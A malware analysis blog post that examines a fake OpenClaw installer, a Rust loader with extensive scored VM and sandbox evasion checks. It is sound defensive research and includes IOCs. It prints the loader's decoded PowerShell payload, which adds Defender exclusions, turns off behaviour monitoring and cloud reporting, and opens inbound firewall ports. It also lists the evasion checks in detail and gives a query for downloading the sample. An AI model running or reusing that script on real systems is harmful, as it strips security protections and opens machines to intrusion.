{"id":366,"date":"2026-03-11T18:07:54","date_gmt":"2026-03-11T18:07:54","guid":{"rendered":"https:\/\/quantusintel.group\/osint\/blog\/2026\/03\/11\/vms-need-not-apply-notopenclaw-malware-analysis\/"},"modified":"2026-03-11T18:07:54","modified_gmt":"2026-03-11T18:07:54","slug":"vms-need-not-apply-notopenclaw-malware-analysis","status":"publish","type":"post","link":"https:\/\/quantusintel.group\/osint\/blog\/2026\/03\/11\/vms-need-not-apply-notopenclaw-malware-analysis\/","title":{"rendered":"VMs Need Not Apply: NotOpenClaw Malware Analysis"},"content":{"rendered":"<h4>The malware loader that takes VM\/sandbox evasion seriously.<\/h4>\n<figure><img data-opt-id=771569372  fetchpriority=\"high\" decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/1024\/1*QgUKxM1tpONKM4jnOaTMEQ.png\" \/><figcaption>Original image from OpenClaw\u2019s GitHub repo. Image modified by\u00a0Copilot.<\/figcaption><\/figure>\n<p>Surprise, surprise\u2026 during a time when you can\u2019t even type the letter \u201co\u201d in a search engine without immediately seeing it include \u201c-penclaw\u201d in the suggestions, threat actors have been trying to capitalize on the popularity of this new super agenic AI solution.<\/p>\n<p>So when I did my usual \u201ceenie meenie miney mo\u201d malware selection process on MalwareBazaar, I randomly tried the query tag:openclaw. When I found a few samples submitted over the weekend, I downloaded the first one I found\u2026 using my <a href=\"https:\/\/medium.com\/the-first-digit\/building-a-secure-personal-reverse-engineering-lab-650280a2c8a9\">new, more secure sample collection process<\/a>. It also had the tag of VidarStealer, so I went into this analysis assuming the usual hallmarks of a stealer, such as enumerating credential stores, keylogging, etc..<\/p>\n<p>Since I didn\u2019t collect this sample in a more \u201cfun\u201d way like directly from a phishing site, I wanted to get a little context on it, so I did a simple Google search for the SHA-256 hash, and realized this sample was featured in an intel article just earlier this\u00a0week:<\/p>\n<p><a href=\"https:\/\/www.huntress.com\/blog\/openclaw-github-ghostsocks-infostealer\">How Fake OpenClaw Installers Spread GhostSocks Malware | Huntress<\/a><\/p>\n<p>I didn\u2019t go much further than learning about the lure (Bing AI search results for \u201cOpenClaw Windows\u201d) and confirming the hash was contained within that article, and set out to see what I could find on my own before actually seeing what the findings\u00a0were\u2026<\/p>\n<h3>Static Anti-Analysis<\/h3>\n<ul>\n<li>Original Filename: TradeAI.exe<\/li>\n<li>Operation system: Windows(Vista)[AMD64, 64-bit,\u00a0GUI]<\/li>\n<li>Linker: Microsoft Linker(14.36.35723)<\/li>\n<li>Compiler: Microsoft Visual C\/C++(19.36.35403)[C++]<\/li>\n<li><strong>(Heur)Language: Rust<\/strong><\/li>\n<li>Library: Direct3D<\/li>\n<li>Library: OpenGL<\/li>\n<li>Tool: Visual Studio(2022, v17.6)<\/li>\n<li><strong>(Heur)Packer: Compressed or packed data[High entropy + Section 1 (\u201c.rdata\u201d) compressed]<\/strong><\/li>\n<li>Debug data: Binary[Offset=0x05871ce4,Size=0x24]<\/li>\n<\/ul>\n<figure><img data-opt-id=71223131  fetchpriority=\"high\" decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/640\/1*cM2uHYm_5TgxknuRX3ZI3Q.gif\" \/><figcaption>Rust? High\u00a0entropy?<\/figcaption><\/figure>\n<p>So I go to the official OpenClaw GitHub repo and what do I\u00a0see?<\/p>\n<figure><img data-opt-id=771569372  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/1024\/1*xOoGVID-qGgL3AiJNSVkgw.png\" \/><figcaption>\u2026a distinct lack of\u00a0Rust.<\/figcaption><\/figure>\n<p>There is a repo for IronClaw (a Rust fork), but based on the original lure, this sample was imitating the base OpenClaw Windows. Rust should play no part\u00a0here.<\/p>\n<p>I\u2019m able to immediately confirm that this was written in Rust by looking at the\u00a0strings:<\/p>\n<figure><img data-opt-id=771569372  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/1024\/1*OmBUvSk72I7dD5CjvteT6w.png\" \/><\/figure>\n<p>Also, interestingly, this actor\u2019s Windows username is \u201croot\u201d, which is not quite enough for attribution, but something to note if it\u2019s seen across multiple\u00a0samples:<\/p>\n<figure><img data-opt-id=771569372  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/1024\/1*RD0Fy-StEM4z-wHdxHEewg.png\" \/><\/figure>\n<p>Also, in the sub_140089dda function, I see a <em>massive<\/em> set of conditions and\u00a0jumps:<\/p>\n<figure><img data-opt-id=576406888  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/485\/1*KkuXejgSK_f5j466TppnbQ.png\" \/><figcaption>This is only a\u00a0snippet.<\/figcaption><\/figure>\n<p>These are all seemingly based around anti-analysis after discovering it\u2019s running in a\u00a0VM:<\/p>\n<figure><img data-opt-id=771569372  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/1024\/1*wdKQVxTWeTVE5bLY-nUsnw.png\" \/><\/figure>\n<p>Needless to say, I\u2019m expecting very extensive anti-analysis capabilities.<\/p>\n<figure><img data-opt-id=1837913559  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/480\/1*GaZLuaNvqkrH0A-JNlBrIg.gif\" \/><figcaption>It\u2019s what I do\u00a0best.<\/figcaption><\/figure>\n<h3>Dynamic Anti-Analysis<\/h3>\n<p>So after detonation, my original hypothesis that this malware incorporates some anti-analysis function to prevent it from running in a virtualized environment is proven correct\u00a0with:<\/p>\n<figure><img data-opt-id=1008138107  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/468\/1*Rpd2zWCgAZhvR8-BW966sg.gif\" \/><\/figure>\n<p>It first appears to attempt to reach a C2 server, but if it\u2019s unable to, it triggers the anti-analysis function, which you can see in the memory\u00a0dump:<\/p>\n<figure><img data-opt-id=168502285  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/616\/1*Ip6yOXqV7vq9o9-mVXQC-Q.png\" \/><\/figure>\n<p>This is just the tip of the iceberg. There are many many <em>many<\/em> (MANY) checks that this malware does to ensure it\u2019s not running in a virtual environment.<\/p>\n<p>One of the first things it does is run a simple ipconfig command, presumably to enumerate for any indications the infected system has a typical VMware or Vbox MAC\u00a0address.<\/p>\n<p>I actually spent a considerable amount of time removing all of the potential artifacts consistent with a VM, but after failure after failure, I decided a different tactic.<\/p>\n<p>It\u2019s not just checking for ipconfig results, but a host of various artifacts about the infected system, whilst also applying a points system to each individual check. If an infected system goes below the threshold, it triggers the anti-analysis function. This can be seen\u00a0here:<\/p>\n<figure><img data-opt-id=297842202  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/581\/1*QQ3dCQyUQtpvUQfbmRNlEw.png\" \/><\/figure>\n<p>At this address, 00007FF78FA74F51, this appears to be the decision point where the malware applied a score to each system check it does on the infected host. After reaching a certain threshold, it will display a message box and terminate itself. If it doesn\u2019t hit that threshold, it will allow execution.<\/p>\n<p>So what does it base this score\u00a0on?<\/p>\n<p>In summary, it\u2019s checking\u00a0for:<\/p>\n<ul>\n<li>It scans the first three octets of the NIC for VMware (such as 00:05:69, 00:0C:29, or00:50:56) or VirtualBox (such as 08:00:27) prefixes.<\/li>\n<li>It flags common default gateway or DHCP ranges commonly used by hypervisors.<\/li>\n<li>It assigns bonus points or even penalties for the detected graphics card. If it detects an integrated or virtual GPU, it gives penalties.<\/li>\n<li>It also gives penalties for generic system hostnames, such as the random 8-character hostnames that are present in every fresh Windows\u00a0install.<\/li>\n<li>It also penalizes VM motherboards, looking instead to only run on known hardware manufacturers (e.g., ASUS or\u00a0MSI).<\/li>\n<li>It also enumerates the system for common RE forensic tools, unsurprisingly assigning penalties if those processes are present on the\u00a0system.<\/li>\n<\/ul>\n<p>This can be seen\u00a0here:<\/p>\n<figure><img data-opt-id=875493860  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/717\/1*epnWSQQFqeL8c2w7LkB34Q.png\" \/><\/figure>\n<p>Aaaand here:<\/p>\n<figure><img data-opt-id=433630435  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/595\/1*HMKJCdc_q4y2EFr9-IbxCw.png\" \/><\/figure>\n<p>Aaaaaaaaand here:<\/p>\n<figure><img data-opt-id=57242973  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/590\/1*5JwWmEOtjwtB3DUHydxJFw.png\" \/><figcaption>Avoid the random 8-character hostname.<\/figcaption><\/figure>\n<p>Then I find the following region:<\/p>\n<figure><img data-opt-id=500758515  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/609\/1*bbAia98UPtVozyOIP53cHw.png\" \/><\/figure>\n<p>There\u2019s a lot here, so here are the usernames it enumerates:<\/p>\n<ul>\n<li>malware<\/li>\n<li>virus<\/li>\n<li>sandbox<\/li>\n<li>sand box<\/li>\n<li>wdagutilityaccount<\/li>\n<li>bruno<\/li>\n<li>maltest<\/li>\n<li>currentuser<\/li>\n<li>jzekker<\/li>\n<li>Janet Van\u00a0Dyne<\/li>\n<li>Harry Johnson<\/li>\n<li>tim<\/li>\n<li>John<\/li>\n<li>cuckoo<\/li>\n<\/ul>\n<p>There are also analysis tools and executables:<\/p>\n<ul>\n<li>mon.dll<\/li>\n<li>SbieDll.dll<\/li>\n<li>SxIn.dll<\/li>\n<li>cmdvrt32.dll<\/li>\n<li>cmdvrt64.dll<\/li>\n<li>ollydbg.exe<\/li>\n<li>x32dbg.exe<\/li>\n<li>x64dbg.exe<\/li>\n<li>windbg.exe<\/li>\n<li>ida.exe<\/li>\n<li>ida64.exe<\/li>\n<li>processhacker.exe<\/li>\n<li>procexp.exe<\/li>\n<li>procexp64.exe<\/li>\n<li>wireshark.exe<\/li>\n<li>fiddler.exe<\/li>\n<li>charles.exe<\/li>\n<li>sandboxie.exe<\/li>\n<\/ul>\n<p>Virtualization:<\/p>\n<ul>\n<li>vmtoolsd.exe<\/li>\n<li>vmwaretray.exe<\/li>\n<li>vmwareuser.exe<\/li>\n<li>vboxservice.exe<\/li>\n<li>vboxtray.exe<\/li>\n<li>administrator<\/li>\n<li>googleinnotek<\/li>\n<li>WaspDESK-IVRUUH4<\/li>\n<li>Y14MARSAMAZING-A<\/li>\n<li>VOCADOO<\/li>\n<li>VirtualBox<\/li>\n<li>Google Compute\u00a0Engine<\/li>\n<li>Virtual Machine<\/li>\n<li>Xeon<\/li>\n<li>EPYC<\/li>\n<\/ul>\n<p>And finally hardware\u00a0IDs:<\/p>\n<ul>\n<li>ol_client_d+$<\/li>\n<li>08:00:27 (Prefix for VirtualBox MAC addresses)<\/li>\n<li>00:15:5D (Prefix for Hyper-V MAC addresses)<\/li>\n<li>52:54:00 (Prefix for QEMU\/KVM MAC addresses)<\/li>\n<li>MBD-R40311-3550-2146-3025-5233-5781-381234567890<\/li>\n<\/ul>\n<p>In the memory dump, there is a large seemingly base64 encoded string, which then had to be XOR-decoded, and the\u00a0results:<\/p>\n<pre># === WINDOWS DEFENDER EXCLUSIONS ===<br \/>$paths = @(<br \/>    'C:Users',<br \/>    \"$env:TEMP\",<br \/>    'C:ProgramData',<br \/>    'C:OneDriveTemp',<br \/>    'C:UsersPublic',<br \/>    'C:Windows'<br \/>)<br \/>foreach ($item in $paths) {<br \/>    Add-MpPreference -ExclusionPath '$item'<br \/>}<br \/><br \/># === PROCESS EXCLUSIONS ===<br \/>Add-MpPreference -ExclusionProcess 'powershell.exe'<br \/>Add-MpPreference -ExclusionProcess 'pwsh.exe'<br \/><br \/># === DISABLE DEFENDER TELEMETRY \/ CLOUD FEATURES ===<br \/>Set-MpPreference -MAPSReporting 0<br \/>Set-MpPreference -DisableBlockAtFirstSeen $true<br \/>Set-MpPreference -SubmitSamplesConsent NeverSend<br \/>Set-MpPreference -CloudBlockLevel 0<br \/>Set-MpPreference -PUAProtection disable<br \/><br \/># === DISABLE CORE PROTECTION FEATURES ===<br \/>Set-MpPreference -DisableIOAVProtection $true<br \/>Set-MpPreference -DisableBehaviorMonitoring $true<br \/><br \/># === FIREWALL RULES - OPEN INBOUND PORTS ===<br \/>New-NetFirewallRule -DisplayName \"Port 57001 TCP\" -Direction Inbound -LocalPort 57001 -Protocol TCP -Action Allow -Enabled True<br \/>New-NetFirewallRule -DisplayName \"Port 57002 TCP\" -Direction Inbound -LocalPort 57002 -Protocol TCP -Action Allow -Enabled True<br \/>New-NetFirewallRule -DisplayName \"Port 56001 TCP\" -Direction Inbound -LocalPort 56001 -Protocol TCP -Action Allow -Enabled True<\/pre>\n<p>This is a clear defense evasion and C2 staging script designed\u00a0to:<\/p>\n<ul>\n<li>Cover multiple writable paths (e.g., C:Users, %Temp%,\u00a0etc.).<\/li>\n<li>Includes exclusions for PowerShell using both powershell.exe and pwsh.exe, which means that any payload that is invoked by PowerShell runs without\u00a0issue.<\/li>\n<li>It disables sample submission and blocks the payload(s) being flagged by cloud\u00a0backups.<\/li>\n<li>It disables IOAV (on-access scan for downloaded content) and behavior monitoring (for heuristic-based detection).<\/li>\n<li>Opens up TCP ports 57001, 57002,\u00a056001.<\/li>\n<\/ul>\n<p>Then at the RVA of 00007FF78FA73D58, I can see the IP config command where it\u2019s looking for a default NAT\u00a0address:<\/p>\n<figure><img data-opt-id=494979140  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/651\/1*0BGjCRvjtHP514gG-yPyxA.png\" \/><\/figure>\n<p>Then when the infected system reaches the threshold for termination:<\/p>\n<figure><img data-opt-id=1296819789  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/622\/1*g54e08JUjjucJ_0X7GIT6w.png\" \/><\/figure>\n<p>This is where the malware will decide that it will not run and terminate.<\/p>\n<p>I first tried NOPing all the many \u201clow threshold\u201d decision points leading to termination, but this was an inefficient and ultimately fruitful exercise:<\/p>\n<figure><img data-opt-id=1994845865  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/504\/1*H369TIDqvOOnPaRdoX4Zog.png\" \/><figcaption>Lots of\u00a0failure\u2026<\/figcaption><\/figure>\n<p>No matter how many times I tried, I ended up seeing that message box, but I was determined. I eventually realized that message box was being called by MessageBoxW, so I instead focused on\u00a0that.<\/p>\n<p>It took multiple tries because of the multi-threaded nature of the binary, but I finally managed to hone in on only 4 needed patches. Instead of trying to NOP the je instructions that would let me bypass a negative decision point, I instead just turned the je instructions that would say \u201csafe to execute\u201d into jne instructions.<\/p>\n<p>Then I finally saw what I was looking for this whole time\u2026 that beautiful rotating fake loading\u00a0screen:<\/p>\n<figure><img data-opt-id=1649720757  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*Ihfvjmh9n5QzykAO9pc7wA.gif\" \/><figcaption>See what\u2019s behind it? ProcMon with a Event Class is Network\u00a0filter\u2026<\/figcaption><\/figure>\n<figure><img data-opt-id=574365634  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/358\/1*d65lEW8Xr7B4jlsbh08KhA.gif\" \/><\/figure>\n<p>And would you look at that! There were so many TCP and UDP send\/receive events in ProcMon, I decided to go over to Wireshark, and lo and\u00a0behold:<\/p>\n<figure><img data-opt-id=771569372  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/1024\/1*Qf41vJ8DlvDbRvJAiKMKfA.png\" \/><\/figure>\n<figure><img data-opt-id=637495736  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/498\/1*C_6xtJZzUbxcz9ZpDRuyOQ.gif\" \/><\/figure>\n<p>I got some\u00a0IOCs!<\/p>\n<p>Unfortunately, I couldn\u2019t retrieve the full URLs, despite checking multiple sources from both FLARE-VM and\u00a0REMnux.<\/p>\n<h3>Summary<\/h3>\n<p>I\u2019ll be honest. I\u2019m proud of\u00a0myself.<\/p>\n<p>Binary patching isn\u2019t easy, and I managed to succesfully patch probably the most sophisticated Rust-based malware loader I\u2019ve personally ever come across. I have to tip my hat to the author(s).<\/p>\n<blockquote><p>Note: Don\u2019t do cybercrime.<\/p><\/blockquote>\n<h3>Tactics, Techniques, and Procedures (TTPs)<\/h3>\n<p><a href=\"https:\/\/medium.com\/media\/a8707d08dc2c5206b87347d0ad725c89\/href\">https:\/\/medium.com\/media\/a8707d08dc2c5206b87347d0ad725c89\/href<\/a><\/p>\n<h3>Indicators of Compromise<\/h3>\n<h4>Host<\/h4>\n<p>TradeAI.exe (aka NotOpenClaw) SHA-256\u00a0hash:<\/p>\n<pre>249058ce8dc6e74cff9fb84d4d32c82e371265b40d02bb70b7955dceea008139<\/pre>\n<h4>Network<\/h4>\n<p>External IP address\u00a0check:<\/p>\n<pre>checkip.amazonaws.com<\/pre>\n<p>Domains (presumably for retrieving C2 configs or\u00a0files):<\/p>\n<pre>pastebin.com<br \/>snippet.host<\/pre>\n<blockquote><p>Please note that these sites are not malicious in of themselves, but can be leveraged in a malware\u2019s operations to store payloads. If your organization has no business use case, then you can safely block them, but if you do have a business use case to allow their traffic, these IOCs can added to detection and alerting\u00a0logic.<\/p><\/blockquote>\n<blockquote><p>If you randomly see both domains cross your firewall right before a cyber incident, you might be infected with this\u00a0loader.<\/p><\/blockquote>\n<h3>References<\/h3>\n<ul>\n<li>Intel Article: <a href=\"https:\/\/www.huntress.com\/blog\/openclaw-github-ghostsocks-infostealer\">https:\/\/www.huntress.com\/blog\/openclaw-github-ghostsocks-infostealer<\/a><\/li>\n<\/ul>\n<h3>Sample<\/h3>\n<p>Can be downloaded from MalwareBazaar by taking the SHA-256 hash and searching for it with the\u00a0query:<\/p>\n<pre>sha256:249058ce8dc6e74cff9fb84d4d32c82e371265b40d02bb70b7955dceea008139<\/pre>\n<p>fmt.Println(\u201cThanks for reading! If you enjoyed this article, please <a href=\"https:\/\/linktr.ee\/grepstrength\">check out all my\u00a0links<\/a>!&#8221;)<\/p>\n<p><img data-opt-id=574357117  decoding=\"async\" src=\"https:\/\/medium.com\/_\/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=1b1a68bf51fb\" width=\"1\" height=\"1\" alt=\"\" \/><\/p>\n<hr \/>\n<p><a href=\"https:\/\/osintteam.blog\/vms-need-not-apply-notopenclaw-malware-analysis-1b1a68bf51fb\">VMs Need Not Apply: NotOpenClaw Malware Analysis<\/a> was originally published in <a href=\"https:\/\/osintteam.blog\/\">OSINT Team<\/a> on Medium, where people are continuing the conversation by highlighting and responding to this story.<\/p>","protected":false},"excerpt":{"rendered":"<p>The malware loader that takes VM\/sandbox evasion seriously. Original image from OpenClaw\u2019s GitHub repo. Image modified by\u00a0Copilot. Surprise, surprise\u2026 during a time when you can\u2019t even type the letter \u201co\u201d in a search engine without immediately seeing it include \u201c-penclaw\u201d in the suggestions, threat actors have been trying to capitalize on the popularity of this &#8230; <a title=\"VMs Need Not Apply: NotOpenClaw Malware Analysis\" class=\"read-more\" href=\"https:\/\/quantusintel.group\/osint\/blog\/2026\/03\/11\/vms-need-not-apply-notopenclaw-malware-analysis\/\" aria-label=\"Read more about VMs Need Not Apply: NotOpenClaw Malware Analysis\">Read more<\/a><\/p>\n","protected":false},"author":1,"featured_media":367,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-366","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts\/366","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/comments?post=366"}],"version-history":[{"count":0,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts\/366\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/media\/367"}],"wp:attachment":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/media?parent=366"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/categories?post=366"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/tags?post=366"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}